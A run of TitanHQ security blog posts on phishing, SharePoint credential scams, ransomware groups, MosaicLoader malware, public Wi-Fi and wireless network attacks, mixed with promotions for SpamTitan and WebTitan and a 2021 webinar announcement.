The website the user is asked to visit does not start with HTTPS and does not have the green padlock symbol in the address bar.
The email requests personal information be disclosed such as bank account details, credit card numbers, or security questions and answers.
A user is requested to download or install software on their device.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
HTTPS Does Not Mean a Website is Genuine
There has been a general push to get businesses to make the switch from HTTP to HTTPS by installing an SSL certificate. The SSL certificate binds a cryptographic key to an organization’s details and activates both the padlock sign and changes a website to start with HTTPS. This ensures that the connection between the browser and the webserver is encrypted and secured.
If the website has a valid SSL certificate installed, it reduces the potential for snooping on information as it's entered in the browser – credit card information for example. However, what an SSL certificate will not offer is a guarantee that information is safe and secure.
A website owned by or controlled by a cybercriminal could have a valid SSL certificate and start with HTTPS and have a green padlock. Disclosing information on that site could see sensitive information handed to a scammer.
As more and more businesses have made the transition to HTTPS, so have cybercriminals. According to the Anti-Phishing Working Group’s (APWG) Q1, 2018 phishing activity trends report, 33% of all phishing websites now use HTTPS and have valid SSL certificates. HTTPS and a green padlock do not mean that a website is genuine. It only means information entered on the site via the browser is secured.
HubSpot's SSL encryption features automate your website security without plugins, so your site stays secure without any of the manual upkeep.
Anti-Phishing Best Practices to Adopt
Exercise caution when someone sends you a hyperlink in a text message or email. The sender may not be who you think it is. A contact or family member’s email account may have been compromised or their phone stolen or the email address may have been spoofed.
Never open email attachments in unsolicited emails from unrecognized senders.
Beware of any email that suggests urgent action must be taken, especially when there is a threat or negative consequences for inaction - your account will be suspended or deleted for example.
If in doubt about the genuineness of an email, do not click any links or open any attachments. Simply delete the message.
Businesses should implement an advanced spam filter to prevent the majority of phishing emails from reaching inboxes.
Businesses should also implement DMARC to prevent spoofing of their brands.
Businesses should provide ongoing security awareness training to employees to teach them the skills required to identify phishing emails and smishing attempts such as this PayPal text phishing scam.
If you run a business and are concerned about phishing, TitanHQ can help. TitanHQ has developed an award-winning anti-spam and anti-phishing solution that blocks more than 99.9% of spam and malicious messages, incorporates dual anti-virus engines to detect malicious attachments, includes DMARC authentication, and sandboxing to perform in-depth analyses of malicious attachments. The solution works seamlessly with Office 365 to improve phishing detection and keep users' inboxes free from spam, phishing, and other malicious emails. Further, TitanHQ operates a highly competitive pricing policy and SpamTitan can be used at a fraction of the cost of other anti-phishing solutions.
Contact TitanHQ and arrange a product demonstration, sign up for a free trial of the full solution (including support), and discover the difference SpamTitan can make to your organization's security posture.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
A new SharePoint phishing scam has been detected which attempts to steal Office 365 credentials from business users. those credentials are subsequently used to gain access to sensitive company information stored in the cloud and email accounts which can be used in phishing and business email compromise attacks.
The latest scam uses messages that appear to be standard quests to collaborate on SharePoint. This SharePoint phishing scam includes a hyperlink to a genuine SharePoint document, which may not be flagged as malicious since the file itself does not contain malware.
The SharePoint file advises the user that the content they are looking for has been uploaded to OneDrive for Business and a further click is necessary to access the file. A hyperlink named “Access Document” is included in the SharePoint file along with the genuine OneDrive for Business logo. At face value, the document does not appear to be malicious, although checking the destination URL of the link will reveal that it directs the user to a suspect website.
After clicking the link, the user is presented with a login window for Office 365 and their Microsoft Office 365 credentials must be entered to proceed. Entering Office 365 credentials at this point will see them harvested by the scammers running this campaign. The user is unlikely to realize that they have been successfully phished as after entering their credentials they will be directed to the genuine Office 365 web page.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
This SharePoint phishing scam is being used in targeted attacks on businesses. SharePoint is commonly used by businesses for collaboration, so there is a high probability that employees will be used to receiving such requests. Finding email addresses for business users is also straightforward. Lists can be purchased on darknet marketplaces and hacking forums, or they can be obtained from professional social networking sites such as LinkedIn.
This SharePoint phishing scam, Google Docs phishing scams, and similar campaigns spoofing Dropbox are commonplace and are highly effective. They take advantage of familiarity with these collaboration services, trust in the brands, and the lack of security awareness of employees. These brand impersonation attacks use email formats that are identical to those used in genuine collaboration requests, including correct logos, formatting and genuine-looking links, and can be difficult for end users to identify as malicious.
Preventing these SharePoint spoofing scams requires technological solutions to stop the messages from being delivered and links from being followed. Standard Office 365 anti-phishing protections are not particularly effective at blocking threats such as these. Businesses will be better protected using a dedicated anti-phishing solution on top of Office 365. SpamTitan is an award-winning anti-spam and anti-phishing solution that works seamlessly with Office 365 and provides superior protection against phishing attacks. SpamTitan uses a wide range of innovative techniques to identify malicious emails and block them at source to prevent them from reaching end users’ inboxes.
Security awareness training is also vitally important to condition employees to stop and think before taking any action requested in an email and to raise awareness of the use of collaboration requests in phishing campaigns.
If you want to improve email security and better defend your organization against phishing attacks, contact the TitanHQ team today and request further information on SpamTitan. Product demonstrations can be arranged on request, free trials of the full product are available with full support during the trial, and a range of deployment options are available to suit the needs of your business. Also consider using a web filter such as WebTitan, which will block attempts to block websites used for phishing and malware distribution.
Small businesses often lack the budget to employ full time IT staff, so instead rely on Managed Service Providers (MSPs) to meet their IT and cybersecurity needs. Small businesses know about the importance of having good IT support and will also likely be aware of the need to have some cybersecurity defenses in place, but it can sometimes be difficult to get clients to commit to purchasing the cybersecurity solutions they need to block cyberattacks that could cripple the business.
MSPs therefore need to communicate the importance of cybersecurity and the solutions that are necessary to reduce risk to protect their clients. Without the right solutions in place, clients will be at risk of suffering a costly data breach, and potentially regulatory fines and litigation. It will also be the MSP that will most likely be required to put the time and effort into getting the business back up and running following a cyberattack, and an MSP may also be blamed for not preventing the breach in the first place.
So how can MSPs sell cybersecurity solutions to their clients? What techniques can be used to get clients to commit to purchasing the solutions they need to protect their networks and infrastructure from attack?
Cybersecurity Selling Techniques for MSPs to Improve Customers’ Defenses and Monthly Revenue
Many small businesses will have little in the way of cybersecurity defenses, so this presents MSPs with an opportunity to increase their revenue, but first they must make sure that a client is aware of the importance of cybersecurity and having the right infrastructure and security solutions in place. It is up to the MSP to communicate the need for cybersecurity defenses to block credible threats, as many businesses will not understand the risks they face and the true cost of a data breach.
One of the most important elements of selling cybersecurity to clients is to have a good understanding of the risks a business faces and the level of risk each business is prepared to tolerate. Each business will be different and, most likely, there will be different risks within each business that need to be addressed.
It pays to take some time to audit and review those risks, and then to develop a cybersecurity strategy for the business that is tailored to its needs, rather than trying to sell a standard package of security solutions.
It is unlikely that a small business will be effective at conducting their own cybersecurity risk assessments. By becoming proficient in conducting risk assessments, MSPs will be able to gain a competitive advantage. If an MSP can present an accurate risk assessment to a customer, along with cybersecurity solutions that will reduce all risks identified to a reasonable an acceptable level, it will be much easier to get clients to buy in and sign up for the products and services they need to reduce those risks.
When selling cybersecurity solutions, it pays to focus more on the risks and how they will be addressed, rather than the technical aspects of each solution. That information can naturally be shared if required, but it is better to explain how the solutions meet the needs of the business and the benefits they provide. Cybersecurity solutions are expensive for small businesses, so before a business commits to a purchase – which can involve a significant upfront cost – they need to know the benefits the investment will bring and how it will likely save them considerable costs in the long run by preventing costly data breaches and the resultant downtime.
Customer Support Needs to Include Cybersecurity
Having the right cybersecurity solutions in place is only part of the story. It is also important to ensure that there is adequate monitoring in place. Cybersecurity solutions must be correctly configured and maintained so MSPs will need to make sure the staff is on hand to identify and respond quickly to any threat and neutralize it. Cybersecurity support also needs to be sold to clients.
You must be clear about the different between IT support and cybersecurity support. Clients are likely to need an MSP to provide basic IT support but may also expect the MSP to deal with cybersecurity issues as well. It is vital to communicate the difference and to cover cybersecurity support when onboarding a new client.
By explaining the need for cybersecurity and providing tailored solutions and the right level of support, MSPs will be able to earn the trust of their clients and be able to reassure them that their infrastructure and data will be kept safe and secure. As the business grows, that trust will be invaluable in getting the business to buy into more advanced cybersecurity solutions as their risk profile changes.
When it comes to finding solutions to meet the needs of MSP clients, TitanHQ can help. TitanHQ provides reasonably priced, powerful and effective cybersecurity solutions to block the most common attack vectors, along with a solution for backing up and archiving business critical data.
For more information on these solutions give the TitanHQ team a call and ask about TitanHQ email security, DNS filtering, and email archiving, and the TitanShield Partner Program. MSPs that join the TitanShield Program will be provided with extensive tools, marketing resources, and training aids to help them sell cybersecurity solutions to their clients more effectively.
The dangers of public Wi-Fi are well documented, but the increase in remote working means the threat has grown. During the pandemic, many businesses had little option other than to allow their employees to work remotely. Remote working during the pandemic meant employees working from home, but now that COVID-19 restrictions are easing the dangers of public Wi-Fi have reared their head one again. Many businesses have seen benefits to remote working and are continuing to allow employees to work from home, while many others are considering adopting a hybrid working model, where employees can work remotely for at least some of the week.
The Dangers of Public Wi-Fi
There are a variety of risks when accessing the Internet over public Wi-Fi networks, one of the most serious being the Wi-Fi access point that people connect to is not actually the Wi-Fi network of the establishment where employees are working. It is all too common for threat actors to set up rogue access points that resemble the legitimate Wi-Fi access points that they spoof. Through those access points – often referred to as evil twins – connections are monitored, and no communicated data are secure.
Attackers often inject malicious proxies, eavesdrop on network traffic, and use redirects to send Wi-Fi users to malicious websites. While perhaps unlikely in a local coffee shop, it is possible to compromise wireless technologies such as Bluetooth and Near Field Communication (NFC), and these tactics are commonly used, especially in foreign countries. If Bluetooth and NFC are enabled, an attacker could scan for nearby devices and gain information that could allow them to identify and target a particular individual.
How to Reduce Risk
There are various steps that remote workers should take to ensure they do not unwittingly fall victim to a malware infection, disclose their credentials in a phishing attack, or otherwise compromise their device, and in turn, the network of their employer. The most straightforward of these measures is to simply not use public Wi-Fi networks, although that is not always possible for travelling employees.
If it cannot be avoided, it is important to connect to a Wi-Fi hotspot that has encryption and strong authentication, as security will be greater. It is never a good idea to connect to any Wi-Fi network that has no security and does not require a password to connect, but it can be difficult to determine how good Wi-Fi security actually is.
It is important to remember that having a password on a Wi-Fi access point does not mean there is data encryption, so any transmitted data may be intercepted. Even with encryption, if an attacker knows the pre-shared key, the encryption is rendered useless as data can easily be decrypted.
It is also possible to force a network into using unsecure protocols or obsolete algorithms, and there are widely available open-source tools that can easily be used to capture credentials and other sensitive data.
It is therefore important to take precautions. For employees, the steps are straightforward. Avoid public Wi-Fi networks if at all possible and avoid disclosing any sensitive data on websites that do not start with HTTPS. Bear in mind that hackers can set up HTTPS websites just as easily as anyone else so be sure not to place too much reliance on https for providing security.
Employees should avoid disclosing any sensitive data or accessing their email or work network entirely over public Wi-Fi if possible, and to ensure that tools supplied by employers – such as a VPN – are used.
Employers should ensure a Virtual Private Network (VPN) is available to employees and there is sufficient capacity to allow all workers to connect. Employers can – and should – extend the protection of their web filtering solution to remote workers’ devices. Web filters will block access to known malicious websites and can block malware downloads. Solutions such as WebTitan are easy to configure to protect remote workers’ devices, and filtering controls will then be applied just as if the employees are in the office.
Standard cybersecurity best practices should also be followed, such as ensuring patches and software are kept up to date, including VPNs. Multifactor authentication should be enabled and anti-malware software installed. Anti-spam solutions – SpamTitan for example – should also be implemented to block email attacks, and firewalls should be used to prevent unauthorized inbound and outbound connections.
It is also recommended to disable Link-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) on Windows laptops and to configure Web-Proxy Autodiscovery Protocol (WPAD) to use only corporate proxy servers and to turn off device file and printer sharing on public networks.
Following the ransomware attacks on critical infrastructure in the United States, several ransomware-as-a-service operations went quiet. The attacks attracted a lot of heat for ransomware gangs and several groups responded by either implementing new restrictions on the types of entities that their affiliates could attack, shutting down entirely and releasing the keys to allow victims to recover, or simply disappeared from the Internet.
Following the attack on Colonial Pipeline in May 2021 by a DarkSide ransomware affiliate, the DarkSide ransomware gang disappeared from the Internet. The REvil ransomware gang that had been so prolific also went quiet. The gang was behind the attack on JBS Foods which caused the temporary shutdown of two meat processing plants in the United States, and most recently, attacked Kaseya and up to 60 of its customers – mostly MSPs – and 1,500 downstream businesses. Shortly after that attack, its web presence disappeared and the gang went deathly silent.
Then there was Avaddon, another prolific operation. After the DarkSide attack on Colonial Pipeline, the Avaddon and REvil operators announced that they would be preventing their affiliates from conducting attacks on critical infrastructure, healthcare, and others. Avaddon later released the keys to allow 2,934 victims to recover and appeared to have walked away from ransomware attacks. Popular hacking forums took the decision to distance themselves from ransomware, even going as far as banning ransomware actors from posting on their forums.
Following the critical infrastructure attacks, the United States government has taken several steps to allow it to target ransomware gangs more effectively and has demanded Russia take action to stop ransomware gangs that are operating within Russia’s borders. The heat has certainly been turned up and RaaS operations are being scrutinized.
There has been considerable speculation about whether government agencies have succeeded in taking down some of these RaaS operations, even though none have announced that they are part of any takedown. That is not to say that there was no law enforcement or government action, only that if there was it has all been done on the quiet.
While it would be nice to think that these shutdowns were permanent and ransomware attacks would be slowing, that is unlikely. It is natural for RaaS operators to lie low for a while following such major attacks, especially when governments are now laser focused on tackling the ransomware problem. It is likely that these ransomware operations are just taking a break, and the operators – and certainly the affiliates that conducted attacks under the RaaS programs – will return. The return may well have already happened.
Two new ransomware-as-a-service (RaaS) groups have appeared this month – Haron and BlackMatter – that threat intelligence firms have been investigating. Several have reported this week that they have identified connections with some of the RaaS operations that have recently gone quiet – Avaddon, REvil, and DarkSide.
While no concrete evidence has been found linking the new operations with any of the RaaS operations that have recently disappeared, there are many similarities which suggest that either the Avaddon, REvil, and DarkSide RaaS operations have already rebranded, that affiliates of those operations have branched out and are going it alone, or some members of the shutdown RaaS operations are involved in Haron and BlackMatter to some degree.
Despite the forum bans on advertising RaaS operations, the BlackMatter RaaS has been advertising for affiliates on Russian speaking cybercrime forums, albeit by not stating that they are running a RaaS operation. A user named “BlackMatter” registered an account on July 19 on both the XSS and Exploit criminal forums seeking assistance: Access to the networks of U.S., UK, Australian, or Canadian networks of companies with over $100 million in annual revenues. They also stipulated that they would not be buying access to state institutions or any targets in the healthcare sector, as both REvil and Avaddon announced they would not after the colonial pipeline attack.
The BlackMatter operator also created an Escrow account – used in cases of disputes over payments – and deposited $120,000 – a not insignificant sum. The group is offering between $3K and $100K for access or a share in any ransoms generated in exchange for access. The BlackMatter operators claim their operation incorporates the best features of DarkSide, REvil, and LockBit, all three of which are believed to have operated from within Russia.
Similarities were found between BlackMatter and REvil and DarkSide by several cybersecurity firms, with Recorded Future declaring BlackMatter the successor to DarkSide and REvil, although evidence is circumstantial. For instance, BlackMatter is very similar to BlackLivesMatter, which was the name of the Windows registry used by REvil. Mandiant reports that it has found evidence which points to at least one member of the DarkSide operation being involved with Black Matter, although that individual may simply be an affiliate that has jumped ship when the operation went silent.
The similarities may be coincidence, or the operator may have just saved some time by stealing content and code that had already been created. There are other notable differences between the two in many areas, and no solid proof has been found that suggests Avaddon and Haron are one and the same.
Researchers are still conducting investigations into the new groups, but regardless of who is involved in the operations, their aims appear to be very similar. Both are targeting large organizations with deep pockets and if the RaaS operations that have gone quiet remain out of action, there will be any affiliates looking for a new RAAS operation to join.
These two new RaaS operations could therefore completely fill the gap left by the likes of Avaddon, REvil, and DarkSide and ransomware attacks could well continue at pre-May 2021 levels. What is certain is the ransomware threat is far from over.
A new malware variant has appeared that is being pushed out via malicious search engine advertisements that appear at the top of the listings for searches related to cracked software. The new malware has been dubbed MosaicLoader by Bitdefender researchers, who have seen increasing numbers of the malware appear in recent weeks.
As the name suggests, MosaicLoader is a malware downloader. It has been developed to deliver a range of different payloads onto victims’ devices, with the ‘Mosaic’ part of the name coming from the intricate internal structure of the malware, which was developed to hamper attempts by security researchers to analyze and reverse engineer the malware.
The malware is complex and uses a variety of methods to evade detection and hamper attempts at analysis, including code obfuscation with the code broken into small chunks, shuffling the execution order and creating a mosaic-like structure. The malware also mimics the file information of legitimate software.
The current campaign delivering MosaicLoader targets individuals looking for cracked software, with the adverts appearing in the search engine listings for a variety of keywords and terms associated with pirated software. The initial malware droppers masquerade as executables for a legitimate software, including using company names and descriptions within the metadata and similar icons and file info as legitimate software.
The initial droppers use a variety of names linked to pirated software, including mirc-7-64-keygen-plus-crack-fully-version-free-download, officefix-professional6-122-crack-full-version-latest-2021, and setup-starter_v2.3.1. One of the droppers mimics a legitimate NVIDIA process, although the digital signature is unrelated to NVIDIA. Once users start processes with names in the word cloud of installers, the infection chain commences and will run in the background without alerting the user, with no visible windows displayed.
What makes MosaicLoader particularly dangerous is it can be used to deliver any payload onto a victim’s system. The malware has been observed delivering a broad range of malicious payloads, such as Remote Access Trojans (RATs) and backdoors, cookie stealers, and cryptocurrency miners. Based on the payloads delivered it is likely that, at least initially, MosaicLoader is being operated and used by one threat group, but it could easily be used under the malware-as-a-service model as a malware delivery service.
Protecting against MosaicLoader is straightforward in principle. Users should avoid downloading any cracked software. Not only is it illegal to download cracked software, but there is also a reasonable likelihood that doing so will install malware such as MosaicLoader, spyware, adware, and many potentially unwanted programs (PUPs). It is also necessary to have up to date antivirus/antimalware software installed.
Employees are always looking for ways to make their lives easier and installing unauthorized software – shadow IT – is common. Shadow IT may save an employee time during their working day, but it also carries risks, especially the installation of pirated software. This has become even more of a risk in the COVID-19 era with so many employees working from home.
Businesses can improve protection against MosaicLoader and other malware variants by carefully controlling the websites that employees can access on their corporate devices and under BYOD. Content filters, such as WebTitan, can be configured to restrict access to websites not required for work or block certain categories of website, as well as known malicious URLs.
Web filters can also be configured to block downloads of specific file types, such as software installers and other executable files often used to install malware. It should also be made clear to all staff that the downloading of unauthorized software onto corporate devices is prohibited, and that the installation of cracked software is illegal.
For further information on content filtering with a DNS filter and other cybersecurity measures you can implement to protect against malware, contact TitanHQ today. The WebTitan web filter is available on a free trial and can be implemented in minutes, and showing positive results in under an hour.
Over the past 12 months the number of successful ransomware attacks has increased sharply. Many attacks have been headline news due to the disruption they have caused and the high cost of remediation. The healthcare industry in the United States has been targeted, with the attacks disrupting patient care and putting patient safety at risk. Recently there was an attack on Colonial Pipeline that resulted in the shutdown of a main fuel pipeline serving the East Coast of the United States, while JBS suffered an attack that threatened food production at its U.S. plants.
Ransom payments have also increased and threat actors are stealing data prior to encrypting files to increase the pressure on victims to pay up. Regardless of whether the ransom is paid, the recovery process is slow. Many victims have suffered disruption to business operations for several months and businesses have been forced to permanently close after an attack due to the high costs of recovery.
Ransomware gangs have conducted highly sophisticated attacks but in the most part they have exploited vulnerabilities in security defenses that should not have existed. Most attacks exploit weaknesses that could have been easily addressed had network security best practices been followed. So what mistakes are businesses making that leaves them vulnerable to ransomware attacks?
Security Mistakes That Make Life Easy for Ransomware Gangs
In order for ransomware gangs to conduct a successful attack they must first gain access to the business network by exploiting security vulnerabilities.
While there are many possible attack vectors, the most common is phishing. A phishing campaign is conducted with one of two aims: To steal credentials that allow perimeter defenses to be bypassed, or to install malware that gives the attackers persistent access to the network.
With credential theft, the aim is to obtain credentials of an individual with high-level privileges such as the CEO. With high privileges, an attacker can easily gain persistent access to the network and move laterally. Alternatively, campaigns can be conducted to target lower-level employees and trick them into installing malware.
Most businesses have implemented a spam filter to block malicious messages, but many rely on default Office 365 spam filters, which do not offer a high enough level of protection. Implementing an advanced AI-based spam filter with sandboxing will improve protection.
Stolen credentials allow an attacker to access network resources, but not if multi-factor authentication has been implemented. While not infallible, multi-factor authentication will prevent attackers from using stolen credentials to gain access to networks in the vast majority of cases.
Anti-spam solutions and multi-factor authentication will provide protection from email attacks, but ransomware and other malware is often downloaded via the internet. By implementing a web filtering solution, employees can be prevented from visiting malicious websites and malware downloads can be blocked. Many businesses fail to protect against the web-based component of attacks.
Security Awareness Training
Many businesses rely on technical measures to block threats and neglect the human element. Attacks often target employees, so it is important for security awareness training to be provided and for regular refresher sessions to be conducted to reinforce training. Without training, employees cannot be expected to recognize and avoid threats.
Patching and Software Updates
Vulnerabilities in software, firmware, and operating systems are often exploited. Prompt patching is therefore important. It can be difficult to stay on top of patches and security updates, so patching should be prioritized. Many ransomware attacks have succeeded by exploiting years-old vulnerabilities. If vulnerabilities are not addressed, it will only be a matter of time before they are exploited.
Brute force tactics to guess weak passwords are often effective. As well as creating password policies that require all default passwords to be changed and strong passwords to be set, those policies must be enforced. Provide employees with tools to make creating strong passwords easier, such as providing them with a password management solution.
In the event of an attack, it is vital that damage is limited. Network segmentation is important in this regard. If an attacker bypasses the perimeter defenses, they should not be able to access the entire network. Segmenting the network will limit the potential for lateral movement and minimize the damage that can be caused.
Incident Response Plan
Businesses that have prepared for the worst and have developed and tested an incident response plan will recover much faster and will be able to limit the harm caused. Importantly, the business will be able to continue to operate while the attack is remediated.
Many businesses mistakenly believe that having backups will allow them to recover quickly in the event of an attack when that is often not the case. Regular backups must be created, and those backups must be tested to make sure file recovery is possible and data have not been corrupted. One copy of a backup must also be stored on an isolated system or device that cannot be accessed from the network where the data resides.
By addressing these common security mistakes, ransomware gangs will find it much harder to breach defenses.
The best place to start is by speaking to TitanHQ’s security experts about implementing cybersecurity solutions to block the most common attack vectors. Give the TitanHQ team a call today and take the first step toward improving your security posture against ransomware, malware, and phishing attacks.
The pandemic forced businesses to adopt different working practices. Rather than having employees working from the office, restrictions introduced to combat COVID-19 meant businesses had to allow their employees to work from home. Protecting business networks when virtually all workers are accessing those networks remotely was a major challenge and it was inevitable that vulnerabilities would be introduced that could potentially be exploited by threat actors.
Those vulnerabilities were exploited, with cybercriminals and APT groups targeting at-home workers mostly by exploiting vulnerabilities in remote access systems and through phishing attacks to obtain credentials to allow networks to be accessed. While these attacks had many different goals, one of the most common was to encrypt files using ransomware to prevent them from being accessed, usually with data theft prior to file encryption.
According to Osterman Research, the three main priorities for cybersecurity in 2021 are protecting endpoints, educating users about ransomware and stopping them becoming victims of attacks, and protecting backups from ransomware. The fact that two of the three main priorities are related to ransomware show just how serious the threat has become.
Protecting endpoints requires a combination of cybersecurity solutions, one of the most important being an advanced email security solution. Email is the attack vector of choice in cyberattacks and is commonly the initial attack vector in ransomware attacks. Phishing campaigns are easy to conduct and they target the weakest link in cybersecurity – employees. Further, with many employees working from home, phishing has become even easier. Studies have shown at-home employees have been taking security shortcuts, with many also admitting to clicking links in phishing emails and opening potentially malicious email attachments. When errors such as this are made, many employees fail to report the matter to their IT department out of fear of reprisals.
Cybersecurity training is important to teach and reinforce cyber hygiene best practices and raise awareness of the threat from ransomware. If employees are not taught how to identify phishing emails and ransomware, they cannot be expected to avoid those threats. With training, susceptibility to phishing can be greatly reduced. However, even with training employees will make mistakes and will fail to recognize every threat.
A recent study conducted by Osterman Research and TitanHQ looked into the main cybersecurity threats faced by security professionals in 2021. The biggest threats were found to be business email compromise (BEC) attacks that tricked employees, phishing messages that result in malware infections, and phishing messages that result in account compromises. The latter is usually the first step in a BEC attack. 85% of interviewed organizations said they had experienced at least one security incident in the past 12 months, and while security professionals were aware of the dangers of phishing and ransomware attacks, only 37% rated their defenses as highly effective.
Due to the lack of confidence in defenses against phishing and ransomware attacks identified by the study, TitanHQ and Osterman Research are hosting a webinar in which attendees will discover the most effective mitigations against phishing and ransomware attacks and will learn best practices they need to adopt to avoid those threats.
Webinar attendees will also learn about the full findings of the in-depth cybersecurity study into the rising threat from phishing and ransomware and how risk can be reduced to a low and acceptable level.
The webinar will be taking place on June 30, 2021:
How to Reduce the Risk of Phishing and Ransomware Attacks
Wednesday, June 30, 2021
7:00 p.m. to 8:00 p.m. BST
2:00 p.m. to 3:00 p.m. EST
11:00 a.m. to 12:00 p.m. PST
The webinar will be conducted by Michael Sampson, Senior Analyst at Osterman Research and Sean Morris, Chief Technology Officer at TitanHQ.
In this post, we explore some of the common wireless network attacks and offer advice on simple steps that can be taken to secure wireless networks and prevent costly data breaches.
Many Businesses are Neglecting WiFi Security
Many businesses have moved from wired to wireless technologies which has had a negative impact on their security posture. Wired networks are generally a lot easier to secure than wireless networks, and poor implementation often introduces vulnerabilities in WiFi networks. Many businesses also fail to perform a thorough risk analysis which means those vulnerabilities are not identified and addressed. Because of these security flaws, and the ease of exploiting them, wireless networks attacks are common.
The Importance of WiFi Security
Wi-Fi access used to be something you had to pay for, but now free WiFi is something many people take for granted. Visitors to a hotel, coffee shop, bar, retail outlet, or restaurant now expect WiFi to be provided free of charge. The decision to use a particular establishment is often influenced by whether free WiFi is available, but increasingly the quality of the connection is a factor in the decision process.
The quality of the WiFi on offer is not just a question of there being enough bandwidth and fast internet speeds. Parents often choose to visit establishments that provide secure WiFi with content control, for instance, businesses that have been verified under the Friendly WiFi scheme. In order to be accredited under the scheme, businesses must have implemented appropriate filtering controls to ensure minors are prevented from accessing age-inappropriate material.
The massive rise in cyberattacks via public WiFi networks coupled with warnings about WiFi risks in the mainstream media has seen many consumers favor establishments that offer secure WiFi access.
If you run a business and are providing WiFi to customers or if you are considering adding a WiFi hotspot to attract more customers, be sure to consider the security of the network. The past couple of years have seen many attacks on WiFi networks and customers who use those wireless services. The increase in WLAN attacks means WiFi security has never been so important.
Before covering some of the most common wireless attacks, it is worthwhile exploring some of the common wireless network vulnerabilities that can be exploited to eavesdrop on traffic, infect users with malware, and steal sensitive information.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Common Wireless Vulnerabilities
Listed below are some of the most common wireless network vulnerabilities and steps that can be taken to prevent the vulnerabilities from being exploited. These wireless network vulnerabilities could easily be exploited in real-world attacks on wireless networks to steal sensitive data, take control of a router or connected device, or install malware or ransomware.
Use of Default SSIDs and Passwords
WIFi access points are shipped with a default SSID and password which need to be changed, but all too often, those default passwords are left in place. That makes it easy for an attacker to log in and take control of the router, change settings or firmware, load malicious scripts, or even change the DNS server so that all traffic is directed to an IP owned by the attacker. Default passwords must be changed to prevent anyone within range of the signal from connecting and sniffing traffic.
If wireless controllers are used to manage WiFi access points via web interfaces, make sure the default passwords are also changed. These default passwords can be easily found online and can be used to attack wireless networks.
Placing an Access Point Where Tampering Can Occur
If the access point is placed in a location where it can be physically accessed, tampering can occur. It takes just seconds to revert the access point to factory default settings. Make sure the access point is located in a secure location, such as a locked closet.
Use of Vulnerable WEP Protocol
The Wired Equivalent Privacy (WEP) protocol was the first protocol used to encrypt wireless traffic. WEP, as the name suggests, was intended to make wireless networks as secure as their wired counterparts, but that does not make WEP wireless networks secure.
WEP is based on the RC4 cypher, which is secure. The problem is how RC4 is implemented in WEP. WEP allows an initialization vector to be re-used, and the re-use of keys is never a good idea. That allows an attacker to crack the encryption with ease. Several other vulnerabilities have been identified in WEP which make it far from secure.
Even though WEP has been depreciated and there are much more secure wireless encryption protocols to use, many businesses continue to use WEP in the mistaken belief that it is secure. WEP is more secure than no encryption at all – bad security is better than no security – but there are much more secure options for encrypting WiFi traffic. If you want to improve security and prevent WLAN attacks, upgrade to WPA2 or WPA3, which use the much more secure Advanced Encryption Standard (AES) and lack the vulnerabilities of WEP.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
WPA2 Krack Vulnerability
WPA may be more secure than WEP, but it is not without its own wireless vulnerabilities. Two Belgian researchers – Mathy Vanhoef and Frank Piessens of the University of Leuven – identified a serious flaw in the WPA security protocol. The flaw was named KRACK, short for Key Reinstallation Attack. The flaw can be exploited in a man-in-the-middle attack to steal sensitive data sent via the WPA encrypted WiFi connection. If the WPA flaw is exploited, an attacker could eavesdrop on traffic and obtain banking credentials, passwords, and credit card information.
The vulnerability exists in the four-way handshake. An encrypted WPA2 connection starts with a four-way handshake, but not all parts of that handshake are required. To speed up re-connections, the third part is retransmitted. That third part of the handshake may be repeated several times, and it is this step that could be used in a wireless network attack.
By repeatedly resetting the nonce transmitted in the third step of the handshake, an attacker can gradually match encrypted packets and discover the full keychain used to encrypt traffic.
A threat actor could set up a clone of a WiFi access point that a user has previously connected to – an evil twin. To the user, nothing would appear untoward as Internet access would be provided via that evil twin. An attacker can force a user to connect to the cloned WiFi network and all information sent via that evil twin WiFi network can be intercepted. While the attack will not work on sites with SSL/TLS encryption, tools can be used that make this possible by forcing a user to visit an HTTP version of the website.
In order to execute a KRACK WiFi attack, the WiFi network must be using WPA2-PSK or WPA-Enterprise and the attacker needs to be within range of the WiFi signal. Virtually all routers currently in use are vulnerable to KRACK WiFi attacks. The best defense is to keep routers up to date and for users to only connect to wireless networks using a paid-for, up-to-date VPN. The issue has been addressed in WPA3, which is supported by the latest wireless access points. However, even with this exceptionally common wireless network vulnerability, WPA2 is still far more secure than WEP.
NetSpectre – Remote Spectre Exploit
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
What are the Most Common Wireless Network Attacks?
Many of the most common wireless network attacks are opportunistic in nature. WiFi hackers look for wireless networks that are easy to attack.
Hackers are more than happy to take advantage of poor security controls to gain access to sensitive information and distribute malware. Why waste time attacking well-secured WiFi networks when there are plenty with scant or no security?
Poorly secured WiFi networks are also targeted by more sophisticated cybercriminals and organized crime groups to gain a foothold in the network. The attacks can be extremely lucrative. Access to a business network can allow ransomware to be installed and if malware can be installed on POS systems, the credit/debit card numbers of tens or hundreds of thousands of customers can be stolen.
Types of Wireless Network Attacks
There are several different types of WiFi attacks that hackers use to eavesdrop on wireless network connections to obtain passwords and banking credentials and spread malware. The main types of WiFi attacks are detailed below.
Fake WiFi Access Points, Evil Twins, and Man in the Middle Attacks
Visitors to hotels, coffee shops, and malls often connect to the free WiFi on offer, but various studies have shown that care is not always taken when connecting. Customers often choose the WiFi access point based on the SSID without checking it is the wireless network set up by a particular establishment for customer use.
Criminals can easily set up fake WiFi access points, often using the name of the establishment in the SSID. An SSID called ‘Free Airport WiFi’ would be enough to get many people to connect. When customers connect to these rogue WiFi networks they can still access the Internet, so are unlikely to realize anything is wrong. However, once connected to that network, everything they do online will be monitored by cybercriminals. Sensitive information entered online, such as email addresses and passwords, credit card numbers, or banking credentials, can and will be stolen.
How is this done? The attacker simply creates a hotspot on a smartphone and pairs it with a tablet or laptop. The hacker can then sit in a coffee shop drinking a latte while monitoring the traffic of everyone that connects. Alternatively, they can use a router with the same name and password as the one currently in use. This may also have a stronger WiFi signal, which may see more people connect. Through the “evil twin” all traffic will be plainly visible to the attacker and all data sent over the network can be captured.
